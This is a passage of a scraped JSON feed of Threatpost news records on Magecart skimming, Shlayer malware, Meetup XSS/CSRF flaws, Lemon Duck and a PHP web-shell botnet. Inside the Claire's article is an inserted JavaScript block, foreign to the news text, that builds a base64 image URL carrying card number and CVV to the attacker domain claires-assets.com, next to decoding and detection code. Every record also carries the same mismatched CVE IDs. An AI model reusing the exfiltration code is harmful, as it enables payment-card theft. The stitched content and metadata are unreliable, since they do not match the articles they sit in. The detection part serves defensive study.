No Social Security numbers, driver license numbers or similar government ID card numbers were caught up in the breach.\n\nMagecart\u2019s focus on attacking victims via the supply chain is part of a larger trend of attackers wanting to \u2018own\u2019 an entire system, including partners and suppliers.\n\nCarbon Black\u2019s Global Incident Response Threat Report last year [found that](<https://threatpost.com/half-all-attacks-supply-chain/143391/>) 50 percent of today\u2019s attacks leverage \u201cisland hopping.\u201d This means that attackers are after not only one target network but also those that are connected via a supply chain.\n\n\u201cTo prevent such attacks from occurring, companies must create and put processes in place to manage and review their susceptibility to the Magecart threat in their cyber supply chain,\u201d said Shapira. \u201cDoing so is important throughout the whole third-party business relationship, and should include continuous monitoring of third parties\u2019 cyber-posture.\u201d\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. 
Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time. [Click here to register](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)._**\n", "cvss3": {}, "published": "2020-01-06T21:47:47", "type": "threatpost", "title": "Magecart Hits Parents and Students via Blue Bear Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-06T21:47:47", "id": "THREATPOST:9BCA61EE1DC2B7F4CCAA9D127D46DBA4", "href": "https://threatpost.com/magecart-blue-bear-attack/151585/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:14:34", "description": "Apple accidentally approved one of the most popular Mac malware threats \u2013 OSX.Shlayer \u2013 as part of its security notarization process.\n\nThe Apple notary service is an automated system for recent macOS versions that scans submitted software (including macOS apps, kernel extensions, disk images and installer packages) for malicious content and checks for code-signing issues. Then, when a macOS user opens the software, Apple\u2019s Gatekeeper security feature checks for a notarization ticket and warns the user if the software is not notarized or cannot be verified.\n\nSecurity researchers [Peter Dantini](<https://twitter.com/PokeCaptain>) and Patrick Wardle recently discovered that Apple inadvertently notarized malicious payloads used in a recent adware campaign.\n\n\u201cUnfortunately a system that promises trust, yet fails to deliver, may ultimately put users at more risk,\u201d said Wardle in a [Sunday analysis](<https://objective-see.com/blog/blog_0x4E.html>). \u201cHow so? If Mac users buy into Apple\u2019s claims, they are likely to fully trust any and all notarized software. This is extremely problematic as known malicious software (such as OSX.Shlayer) is already (trivially?) 
gaining such notarization.\u201d\n\nOn Friday, Dantini noticed that a website (homebrew[.]sh) was actively hosting an adware campaign. The website is likely spoofing the legitimate Homebrew site (hosted at brew.sh), a free and open-source package manager that simplifies the installation of software on macOS.\n\n> So I accidentally found a thing <https://t.co/WVL86rYzrm>\n> \n> \u2014 Peter H. Dantini (@PokeCaptain) [August 31, 2020](<https://twitter.com/PokeCaptain/status/1300440938301607939?ref_src=twsrc%5Etfw>)\n\nWhen users visited the website, it redirected several times before telling them that their Adobe Flash Player was out of date and recommending an update (via at least three separate pop-ups in the browser). While the campaign looks like a run-of-the-mill adware attack, what is different is that, because the payloads were notarized, macOS showed none of the usual warnings that the developer cannot be verified and that the app may contain malware.\n\nThe adware payloads were fully notarized in this campaign, meaning the malicious payloads had been submitted to Apple prior to distribution, scanned by Apple\u2019s automated system, and passed with no malicious code detected.\n\nUpon further inspection, Wardle discovered that the notarized payloads appear to be OSX.Shlayer malware.\n\nAfter running the payloads in an instrumented virtual machine, Wardle captured the execution of various shell commands that change file modes, execute and delete files, and more.\n\nShlayer is one of the most common threats to Macs. In fact, last year it made up 29 percent of all attacks on macOS devices in Kaspersky\u2019s telemetry for 2019, making it the [No. 1 Mac malware threat](<https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/>) for the year. 
[More recently,](<https://threatpost.com/shlayer-mac-malware-extra-sneakiness/156669/>) a new variant of the malware has been spotted actively using poisoned Google search results in order to find its victims.\n\nAfter the malicious payloads were spotted, Wardle notified Apple, which revoked their certificates on Aug. 28. Yet by Aug. 30 (Sunday), the adware campaign was still live and serving up new notarized payloads.\n\n\u201cBoth the old and \u2018new\u2019 payload(s) appear to be nearly identical, containing OSX.Shlayer packaged with the Bundlore adware,\u201d said Wardle. \u201cHowever the attackers\u2019 ability to agilely continue their attack (with other notarized payloads) is noteworthy. Clearly in the never-ending cat and mouse game between the attackers and Apple, the attackers are currently (still) winning.\u201d\n\nThe Bundlore adware\u2019s goal is generally to install various browser extensions and show victims various ads, Wardle told Threatpost. As of Monday, these newer notarized payloads had also been revoked by Apple, Wardle told Threatpost.\n\n\u201cMalicious software constantly changes, and Apple\u2019s notarization system helps us keep malware off the Mac and allow us to respond quickly when it\u2019s discovered,\u201d an Apple spokesperson told Threatpost. \u201cUpon learning of this adware, we revoked the identified variant, disabled the developer account, and revoked the associated certificates. We thank the researchers for their assistance in keeping our users safe.\u201d\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. 
[Register today](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\u201d. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) webinar.**\n", "cvss3": {}, "published": "2020-08-31T19:45:07", "type": "threatpost", "title": "Apple Accidentally Notarizes Shlayer Malware Used in Adware Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-31T19:45:07", "id": "THREATPOST:2DF088ED0B48BE31C97E898391B83566", "href": "https://threatpost.com/apple-accidentally-notarizes-shlayer-malware/158818/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:18:21", "description": "A Magecart credit-card skimmer was used to attack online customers of the retailer Claire\u2019s for a month and a half, according to researchers.\n\nClaire\u2019s \u2013 a purveyor of jewelry and accessories \u2013 closed its 3,000 physical retail locations worldwide on March 20, in the wake of the COVID-19 pandemic. 
An analysis from the Sansec Threat Research Team shows that a Magecart group saw an opportunity to harvest payment-card data in the closures \u2013 likely assuming that online sales activity would ramp up with no brick-and-mortar outlets available to shoppers.\n\n\u201cFollowing common Magecart malpractice, payment skimmers were injected and used to steal customer data and cards,\u201d according to Sansec.\n\n[Magecart](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>) is an umbrella term encompassing several different threat groups who typically use the same _modus operandi._ They compromise websites, typically by exploiting vulnerabilities in, or otherwise compromising, third-party eCommerce platforms, in order to inject card-skimming scripts on checkout pages. Magento-based hacks are seen most often, but Magecart also attacks other platforms, including Opencart, BigCommerce, Prestashop and Salesforce.\n\nAt Virus Bulletin last October, researchers at RiskIQ [said that](<https://threatpost.com/magecart-infestations-saturate-web/148911/>) Magecart is now so ubiquitous that its infrastructure is flooding the internet. There are at least 570 known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains, researchers said.\n\nIn this case, Sansec telemetry picked up malicious code being injected into the Claire\u2019s official eCommerce website (and that of its sister store, Icing), starting in late April. The malware persisted until this weekend, when it was removed on June 13.\n\nSpecifically, code was added to the online check-out pages for the stores, and linked to the \u201cSubmit\u201d button that shoppers use to submit their payment information. 
To hook into the Submit handler, the malicious code was added to app.min.js, a legitimate file hosted on the store servers.\n\nWhen a user clicked the button, the injected code intercepted all customer information entered during checkout, base64-encoded it, appended it to the address of an image element, and thereby sent it off to a collection website controlled by the attackers, \u201cclaires-assets[dot]com.\u201d Because the data leaves the browser as an ordinary image request rather than a form post or XMLHttpRequest, it is easy to miss in network monitoring.\n\n\u201cThis approach uses image exfiltration (which is often not monitored by security systems) and uses a U.S.-based collection server, which is rare for this type of attack,\u201d Sansec founder Willem de Groot told Threatpost. \u201cI suspect that the collection server will be confiscated by U.S. law enforcement shortly.\u201d\n\nOn the technical front, \u201cA temporary image is added to the DOM with the __preloader identifier,\u201d according to the [Sansec analysis](<https://sansec.io/research/magecart-corona-lockdown>), released on Monday. \u201cThe image is located on the server as controlled by the attacker. Because all of the customer submitted data is appended to the image address, the attacker now has received the full payload. Immediately, the image element is removed.\u201d\n\nClaire\u2019s runs on the Salesforce Commerce Cloud, previously known as Demandware, which is a hosted eCommerce platform, according to researchers. While Sansec doesn\u2019t have insight into how the website was initially compromised, any of the usual suspects could have been a factor. 
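The exfiltration path described above, as an added example that is neither Sansec's code nor the skimmer itself: it builds the image address such a skimmer would request, decodes one back (for an analyst reading a proxy log or HAR export), and flags image requests that carry a base64 payload to a host outside the store's own image hosts. Only the collection domain comes from the report; the payload layout (JSON, base64, a single query parameter), the /__preloader.gif path, the allowlist and the sample checkout data are constructed assumptions. In the browser, the string buildExfilUrl returns would be assigned to the src of a temporary <img> element carrying the __preloader identifier, which is removed once the request has gone out.

```javascript
// Added example of the image-exfiltration channel above; not Sansec's code
// and not the skimmer itself. Payload layout, path, allowlist and sample
// data are assumptions constructed for illustration.
const COLLECTION_HOST = "claires-assets.com"; // collection domain named in the report
// Hosts a checkout page legitimately loads images from (assumed).
const FIRST_PARTY_IMAGE_HOSTS = new Set(["www.claires.com", "www.icing.com"]);

// Skimmer side: serialize the intercepted checkout fields, base64-encode
// them and smuggle them out as the address of an image. Browsers fetch
// <img src> with no CORS preflight and no visible form submission.
function buildExfilUrl(fields, host = COLLECTION_HOST) {
  const payload = Buffer.from(JSON.stringify(fields), "utf8").toString("base64");
  return `https://${host}/__preloader.gif?d=${encodeURIComponent(payload)}`;
}

// Analyst side: recover the fields from a captured image URL, or null when
// the URL carries no decodable base64 JSON object.
function decodeExfilUrl(url) {
  const d = new URL(url).searchParams.get("d");
  if (!d) return null;
  try {
    const parsed = JSON.parse(Buffer.from(d, "base64").toString("utf8"));
    return parsed && typeof parsed === "object" ? parsed : null;
  } catch (e) {
    return null;
  }
}

// Detection over the image URLs a synthetic checkout produced (headless
// browser run, proxy log or HAR export): anything off the allowlist that
// carries a decodable payload, or an unusually long query string, is
// reported; a PAN-shaped run of 13 to 19 digits upgrades the reason.
const PAN_RE = /\b\d{13,19}\b/;
function flagImageExfil(imageUrls, allowlist = FIRST_PARTY_IMAGE_HOSTS) {
  const findings = [];
  for (const url of imageUrls) {
    const parsed = new URL(url);
    if (allowlist.has(parsed.hostname)) continue;
    const data = decodeExfilUrl(url);
    if (data === null && parsed.search.length <= 64) continue;
    const reason = data !== null && PAN_RE.test(JSON.stringify(data))
      ? "base64 payload containing a card-like number"
      : "third-party image request carrying a query payload";
    findings.push({ url, host: parsed.hostname, reason });
  }
  return findings;
}

// Constructed sample: two legitimate images and one exfil request built
// from test data (a well-known test PAN, not a real card).
const SAMPLE_FIELDS = { name: "Test Shopper", card: "4111111111111111", exp: "12/24", cvv: "123" };
const SAMPLE_IMAGE_URLS = [
  "https://www.claires.com/images/logo.png",
  "https://cdn.example-cdn.net/banner.jpg?v=3",
  buildExfilUrl(SAMPLE_FIELDS),
];

if (typeof require !== "undefined" && require.main === module) {
  console.log(flagImageExfil(SAMPLE_IMAGE_URLS));
}
```

A Content Security Policy whose img-src (and connect-src) directive is limited to first-party hosts closes this channel in the browser regardless of whether anyone is watching the logs; and because the skimmer here lived inside the store's own app.min.js, server-side integrity monitoring of deployed assets is the complementary control.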
Those could include leaked admin credentials, spearphishing of Claire\u2019s employees or a compromised internal network.\n\nSansec also pointed out that it\u2019s unlikely that a vulnerability in the Salesforce platform itself was exploited, given that the skimmer was injected directly into code hosted on Claire\u2019s servers.\n\n\u201cSo, there is no \u2018supply-chain attack\u2019 involved, and attackers have actually gained write access to the store code,\u201d researchers said. \u201cIt is unlikely that the Salesforce platform got breached or that Salesforce is responsible for this incident.\u201d\n\nAlso, the claires-assets[dot]com collection website was set up on March 21, a day after the Claire\u2019s retail stores closed. Yet activity didn\u2019t start until the last week in April \u2014 also suggesting that a known bug in Salesforce wasn\u2019t the culprit. \u201cThe domain period between exfil domain registration and actual malware suggests that it took the attackers a good four weeks to gain access to the store,\u201d according to the analysis.\n\nThat said, de Groot noted that \u201cSaaS platforms like Salesforce, Shopify and BigCommerce have much better potential visibility into abuse of their platform, and increased ability to secure their customer base. While legally not culpable, one could argue that they could do more to scan or protect their stores.\u201d\n\nSansec also said that Claire\u2019s responded promptly when notified of the issue. The store issued a statement:\n\n\u201cClaire\u2019s cares about protecting its customers\u2019 data. On Friday, we identified an issue related to our e-commerce platform and took immediate action to investigate and address it. Our investigation identified the unauthorized insertion of code to our e-commerce platform designed to obtain payment card data entered by customers during the checkout process. 
We removed that code and have taken additional measures to reinforce the security of our platform.\u201d\n\nIt also said that it\u2019s working on determining which of its customers were affected by the incident, so it can issue notifications. For its part, Sansec is unsure of the scope of the activity.\n\n\u201cSince the interception happened in real time in the browsers of customers, we have no visibility in the scope of the theft,\u201d de Groot told Threatpost. \u201cClaire\u2019s obviously knows, but I doubt they want to share that info.\u201d\n\n_**Are you on top of the shifting insider threats within your business? On [June 24 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>), join Threatpost and our panel of experts for a FREE webinar, \u201cThe Enemy Within: How Insider Threats Are Changing.\u201d Get exclusive insights on how remote working has increased the risk of insider threats, and how to gain visibility into employee behavior while striking the right balance between privacy and ease of use. [Please register here](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>) for this Threatpost webinar.**_\n", "cvss3": {}, "published": "2020-06-15T15:36:53", "type": "threatpost", "title": "Claire's Customers Targeted with Magecart Payment-Card Skimmer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-06-15T15:36:53", "id": "THREATPOST:63A5AF6DBA80B1406297BB5825D56E32", "href": "https://threatpost.com/claires-customers-magecart-payment-card-skimmer/156552/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:15:56", "description": "A popular online social service, Meetup, has fixed several critical flaws in its website. 
If exploited, the flaws could have enabled attackers to hijack any Meetup \u201cgroup,\u201d access the group\u2019s member details and even redirect Meetup payments to an attacker-owned PayPal account.\n\nMeetup is [a service](<https://www.meetup.com/>) with over 35 million users, used to organize groups and events for people with similar interests. Events are either free or require registration for a fee paid via PayPal. While events are typically in person, in light of the ongoing pandemic many have moved to virtual settings.\n\n\u201cCheckmarx found several \u2018more-common\u2019 API security issues like lack of resources and rate-limiting and excessive data exposure, as well as some serious cross-site scripting (XSS) and cross-site request forgery (CSRF) vulnerabilities on Meetup.com that could put users at risk,\u201d said researchers with Checkmarx, in research disclosed Monday at [Black Hat USA 2020.](<https://threatpost.com/category/bh/>)\n\n**[Learn more about the critical Meetup flaws \u2013 and other AppSec trends and threats researchers expect to see at Black Hat USA 2020 this year \u2013 in Threatpost\u2019s exclusive interview with Checkmarx](<https://threatpost.com/black-hat-usa-2020-critical-meetup-com-flaws-reveal-common-appsec-holes/157950/>)**\n\nResearchers disclosed the issues to Meetup, which has since fixed all the vulnerabilities as of July 15. 
The flaws were not publicly disclosed by researchers until Monday.\n\n\u201cMeetup takes reports about its data security very seriously, and appreciates Checkmarx\u2019s work in bringing these issues to our attention for investigation and follow up,\u201d according to a Meetup statement.\n\nThe first flaw researchers discovered was a stored cross-site scripting (XSS) vulnerability in Meetup\u2019s discussion feature, which is activated by default in a Meetup group. The flaw has a CVSS score of 8.7 out of 10, making it high severity. The issue is that Meetup did not properly sanitize or encode the discussion field before rendering it.\n\nTo exploit the flaw, an attacker simply needs to post a script to the Meetup discussion forum. In the proof of concept this produced a JavaScript popup as soon as any user visited the page; a real attacker would instead let the script run silently in every visitor\u2019s browser and use it to steal web-browsing data (sessions and cookies) or act on the visitor\u2019s behalf.\n\n\u201cNow, instead of having a message or a discussion or a post on the page, we could have put some benign message actually in the background on a script,\u201d Erez Yalon, the director of security research with Checkmarx, told Threatpost. \u201cSo this by itself is very bad already, because it means that in the context of a web browser, we can do whatever we want. Now for every person who visits this discussion board, so it can be stealing information that is part of your web browsing process like cookies and sessions, and things like that. We can deface the website or even do some cryptomining on the web browser.\u201d\n\n(Figure: the Meetup flaws. Credit: Checkmarx)\n\nThe attack was made more severe after researchers also found a CSRF glitch on the Payments Received API endpoint of Meetup. 
CSRF means that once a victim is authenticated to the server, an attacker can make the victim\u2019s browser send requests that the server will trust.\n\nResearchers were able to chain together the XSS flaw and the CSRF glitch, which is the \u201choly grail\u201d for attackers: \u201cWhen you manage to chain these two together, sometimes there are no limits to what can actually happen,\u201d said Yalon.\n\nThat means that if a user with high privileges (like a Meetup group \u201cco-organizer\u201d) clicks on the malicious script, attackers could then escalate their privileges to \u201cco-organizer,\u201d hijack a Meetup group page, and completely manage the group. Since the form to change the PayPal recipient\u2019s email address in Settings / Payments received is vulnerable to CSRF, attackers would also be able to change the PayPal email address of every Meetup user to their own PayPal email address, without the victims noticing.\n\nResearchers also found several other less serious issues in Meetup, including a lack of resources and rate-limiting and an excessive data exposure issue.\n\nThe research was unveiled [this week at Black Hat USA 2020](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>), which kicked off on Saturday and [will focus largely on](<https://threatpost.com/category/bh/>) new security threats, election security, COVID-19 and remote work, and other themes.\n", "cvss3": {}, "published": "2020-08-03T13:05:11", "type": "threatpost", "title": "Meetup Critical Flaws Allow 'Group' Takeover, Payment Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-03T13:05:11", "id": "THREATPOST:54A5A39D65B32844C215D89668BFB79D", "href": "https://threatpost.com/critical-meetup-website-flaws-takeover-payment-theft/157934/", "cvss": {"score": 0.0, "vector": "NONE"}}, 
{"lastseen": "2020-10-15T22:25:07", "description": "Printers, smart TVs and automated guided vehicles that depend on Windows 7 have become the latest juicy targets for cybercriminals leveraging a \u201cself-spreading\u201d variant of the malware Lemon Duck. In a report released Wednesday by TrapX Security, researchers warn manufacturers dependent on IoT devices are targets in a new global campaign leveraging the malware variant.\n\nCriminals behind the wave of attacks are singling out IoT gear in hopes of enlisting them into a \u201cslave army\u201d of crypto-mining devices focused on generating Monero coins via the XMRig mining tool. 
Researchers warn that the processor-intensive mining efforts are taking their toll on gear and triggering equipment malfunctions, along with exposing devices to safety issues, disruption of supply chains and data loss.\n\nThe campaign is similar to a [Lemon Duck campaign spotted in October](<https://news.sophos.com/en-us/2019/10/01/lemon_duck-powershell-malware-cryptojacks-enterprise-networks>); however, in this campaign the malware is being used to intentionally target and cause harm to large manufacturers, researchers told Threatpost.\n\nThe [26-page report by TrapX Research Labs](<https://finance.yahoo.com/news/trapx-security-identifies-malware-campaign-130000671.html>) cites a number of 2019 attacks against three large global manufacturers. The common thread is the use of Lemon Duck malware and the presence of Windows 7 in embedded or associated systems. Windows 7, which TrapX estimates is still used by 200 million devices, has not received security updates from Microsoft since January 14, 2020.\n\nIn each of the case studies outlined by researchers, weaknesses in Windows 7 were used by adversaries as the point of entry. The adversaries exploited unpatched vulnerabilities in Microsoft\u2019s implementation of the Server Message Block (SMB) protocol in the operating system using [the EternalBlue exploits](<https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/>). In addition, researchers said attackers launched SQL injection attacks against vulnerabilities in [the MySQL database application](<https://threatpost.com/critical-mysql-vulnerabilities-can-lead-to-server-compromise/121738/>).\n\n\u201cThe malware sample intercepted and analyzed by TrapX is part of the Lemon Duck sample family running on a double-click action or through persistence mechanisms,\u201d wrote researchers. 
\u201cFirst, the malware scanned the network for potential targets, including those with SMB ([port] 445) or MSSQL ([port] 1433) services open. Once finding a potential target, the malware ran multiple threads with multiple functionalities.\u201d\n\nOne of those functions includes brute-force password attacks to crack open services in order to further download and spread malware via SMB or MSSQL. Another included the \u201crunning of invoke-mimikatz via import-module to obtain NTLM hashes and gain access for the further download and spread of malware via SMB.\u201d\n\nResearchers said the Lemon Duck malware persisted on infected systems via scheduled tasks, which included PowerShell scripts that invoked additional Lemon Duck PowerShell scripts, which then installed the Monero miners (XMRig).\n\nIt\u2019s for good reason that attackers have focused on Windows 7 machines. Researchers said that attacks leveled against Windows 10 machines have consistently been thwarted by basic system defenses.\n\n\u201cThe malware would be quarantined on a Windows 10 system with Windows Defender Virus & Threat protection activated, even if the malware successfully copied itself to the system,\u201d researchers said. \u201cIn contrast, the malware stayed and ran on an infected Windows 7 system even with Windows Defender activated.\u201d\n\nMitigation spelled out by TrapX involves enforcing a strong password policy across all networks and subsystems, keeping systems patched, and exercising hyper-vigilance when it comes to managing network shares and disabling anonymous logins. 
Researchers also highly recommend ending reliance on Windows 7.\n", "cvss3": {}, "published": "2020-02-05T18:50:48", "type": "threatpost", "title": "New Lemon Duck Malware Campaign Targets IoT, Large Manufacturers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-02-05T18:50:48", "id": "THREATPOST:FC124FCB1BDB55D5A63163F8F4720021", "href": "https://threatpost.com/lemon-duck-malware-targets-iot/152596/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:17:40", "description": "The hackers-for-hire group DarkCrewFriends has resurfaced and is targeting content management systems to build a botnet. The botnet can be marshalled into service to carry out a variety of criminal activities, including distributed denial-of-service (DDoS) attacks, command execution, information exfiltration or sabotage of an infected system.\n\nResearchers said they observed DarkCrewFriends exploiting an unrestricted file upload vulnerability to compromise PHP servers that run websites. After compromise, a malicious PHP web shell is installed as a backdoor, which in turn sets up a connection to a command-and-control (C2) server using an Internet Relay Chat (IRC) channel, according to Check Point researchers Liron Yosefian and Ori Hamama.\n\n\u201cMany applications allow users to upload certain files to their servers, such as images or documents,\u201d explained the researchers on Thursday in a [blog post](<https://research.checkpoint.com/2020/the-return-of-the-bot-shop-crew/>). \u201cThese files can put the system at risk if they are not properly handled. A remote attacker can send a specially crafted request to a vulnerable server and upload an unrestricted file while bypassing the server\u2019s file extension check. 
This can eventually result in arbitrary code execution on the affected system.\u201d\n\nThe exploit for the particular vulnerability being targeted is a zero-day that was created and published by DarkCrewFriends, according to Check Point. Threatpost has reached out for more information on the bug and other details of the campaign.\n\nThe web shell on the victim\u2019s server defines either a GET parameter called osc or a GET parameter called anon, and executes a decompressed base64 string, according to the analysis. When researchers decoded the string, they discovered commands to download and execute two .AFF files. .AFF is a spellcheck dictionary file type used by Kingsoft WPS Office and Apache OpenOffice, which are free Office suite applications.\n\nThe infection chain. Source: Check Point\n\n\u201cWhen we downloaded both .AFF files, we saw that those files were actually PHP and Perl files,\u201d the researchers explained. \u201cThe hidden file extension is used to avoid detection and confuse the issue.\u201d\n\nThese files are both variants of the main malware module, which has a wide range of capabilities, including the ability to execute shell commands; gather information on running services on the host computer; download or upload FTP files; scan open ports; and conduct multiple types of DDoS attacks (including UDP and TCP DDoS, HTTP flood, IRC CTCP flood and more).\n\n\u201cThe attackers create a network of botnets by using the IRC protocol to infect connected servers,\u201d the analysts said. 
\u201cThis provides them with a more powerful attack tool and is also used in the traffic services they offer for sale.\u201d\n\nNone of the malware binaries had been uploaded to VirusTotal, they added.\n\n\u201cFollowing the various scenarios and attack methods\u2026we conclude that the impact on the victim\u2019s infrastructure can be severe and have significant repercussions,\u201d Yosefian and Hamama concluded.\n", "cvss3": {}, "published": "2020-06-26T20:53:18", "type": "threatpost", "title": "DarkCrewFriends Returns with Botnet Strategy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-06-26T20:53:18", "id": "THREATPOST:400B0D790B8223A5A004460CD9A927B4", "href": "https://threatpost.com/darkcrewfriends-returns-botnet/156963/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:17:41", "description": "Researchers are warning that the websites of eight U.S. cities \u2013 across three states \u2013 have been compromised with payment card-stealing Magecart skimmers. 
The websites all utilize [Click2Gov municipality payment software](<https://threatpost.com/payment-card-breach-hits-8-cities-using-vulnerable-bill-portal/148521/>), which was previously involved in data breaches.\n\nUnlike other skimmers, which grab data on various types of payment forms on websites, the skimmer in this incident appears to only target website payment forms by Click2Gov. Click2Gov software is used in self-service bill-paying portals used by utilities and community development organizations for things such as paying parking tickets online.\n\n\u201cThe attack occurs when victims make an online payment on the compromised Click2Gov website,\u201d said researchers with Trend Micro in a [Friday analysis](<https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/>). \u201cJavaScript code was injected into the payment page which loads a credit card skimmer when victims browse the payment page.\u201d\n\nThe skimmer is extremely simple; no obfuscation or anti-debugging techniques were used. It hooks the \u201csubmit\u201d event of the payment form, so that when a victim clicks the button to submit their payment information, the skimmer grabs the information from the selected columns inside the payment form and immediately sends the collected information to a remote server via an HTTP POST request.\n\nCybercriminals targeted the credit-card information (including card number, expiration date and CVV), name and contact address for the website users.\n\n\u201cWe were able to identify two of the exfiltration servers used in the attack,\u201d said researchers. \u201cBoth hosted the actual JavaScript skimmer, as well as a .JSP file used to receive the exfiltrated data. One of the servers was used for three sites, while the other server was used for the remaining five sites. 
The two skimmers used are identical, save for the change in the hostname of the exfiltration servers.\u201d\n\nWhen asked if any of the skimmers have been removed from the websites, researchers told Threatpost, \u201cWe don\u2019t have access to that information.\u201d However, they believe that these attacks started on April 10 of this year, and are still active.\n\nWhen asked which city websites were affected in this incident, researchers told Threatpost, \u201cWe can\u2019t say,\u201d adding that Trend Micro \u201cprioritizes responsible disclosure of security incidents and chooses not to \u2018name and shame\u2019 victims. Our primary goal is to help organizations identify and mitigate these incidents. We have notified the breached parties who will be responsible for handling the situation within each city.\u201d\n\n## **Previous Click2Gov Breaches**\n\nClick2Gov was previously afflicted by a vulnerability (rooted in a compromised Click2Gov webserver) that led to two different data breaches of the websites of several towns and cities using the software.\n\nThe flaw was first discovered in [December 2018](<https://threatpost.com/payment-card-breach-hits-8-cities-using-vulnerable-bill-portal/148521/>) after continual breaches of it led to the compromise of at least 294,929 payment cards across the country. Overall, 46 confirmed impacted local governments were caught up in this first breach \u2013 including Saint Petersburg, Fla. (on October 2), Bakersfield, Calif. (November 14), and Ames, Iowa (December 2).\n\n[Then in 2019](<https://threatpost.com/patched-click2gov-flaw-still-afflicting-local-govs/140109/>), the vulnerable municipality payment software was targeted once again, this time as part of a breach involving eight cities in August. 
Those cities were: Coral Springs, Deerfield Beach, Milton and Palm Bay, Fla.; Bakersfield, Calif.; Pocatello, Idaho; Broken Arrow, Okla.; and Ames, Iowa.\n\nThough they did not name the affected cities in this most recent security incident, researchers said that five of the eight cities were also affected in the previous breaches.\n\nA patch was issued for the Click2Gov vulnerability in 2017, but researchers said that the 2018 and 2019 breaches may have stemmed from municipalities not updating their systems.\n\n[Image: Click2Gov skimmer](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/26144049/click2gov-1.png>)\n\nHowever, researchers say, based on an analysis of both the skimmer and the infrastructure, they could not find any connections between this most recent breach and the incidents in 2018 and 2019.\n\n\u201cIt is not clear at this time if this attack which we identified is connected to the earlier breaches, since nothing about their technical details indicates a connection,\u201d said researchers. \u201cThe only connection is that five of the affected cities in the current incident were also affected in 2018; while two were included in the 2019 incident.\u201d\n\nThe Click2Gov software was developed by Superion, which has since [merged](<https://centralsqr.com/press-release/>) with other companies to form a new company called CentralSquare Technologies in July 2018. According to Risk Based Security, there appear to be between 600 and 6,000 installations of Click2Gov indexed.\n\nCentralSquare Technologies did not return a request for comment from Threatpost.\n\nRegardless, the incident shows that credit card skimming attacks are still a major threat to online merchants. Magecart in particular has targeted various websites, from the [Nutribullet website](<https://threatpost.com/magecart-cyberattack-targets-nutribullet-website/153855/>) to an [Olympics ticket reseller](<https://threatpost.com/olympic-ticket-survival-sites-hit-by-cyberattack/152648/>). 
And in April, researchers [observed a new skimmer](<https://threatpost.com/emerging-makeframe-skimmer-magecart-smbs/154374/>) from the Magecart Group actively harvesting payment-card data from 19 different victim websites, mainly belonging to small- and medium-sized businesses (SMBs), for several months.\n\n\u201cDuring 2019, we also saw that [academic institutions](<https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/>) and hotel chains were targeted by similar attacks. This time, the attacker targeted the websites of various local governments,\u201d said Trend Micro researchers.\n", "cvss3": {}, "published": "2020-06-26T20:18:06", "type": "threatpost", "title": "8 U.S. City Websites Targeted in Magecart Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-06-26T20:18:06", "id": "THREATPOST:A6991C9080305907C0352031B295B40D", "href": "https://threatpost.com/8-city-gov-websites-magecart/156954/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:15:15", "description": "A plugin that is designed to add quizzes and surveys to WordPress websites has patched two critical vulnerabilities. 
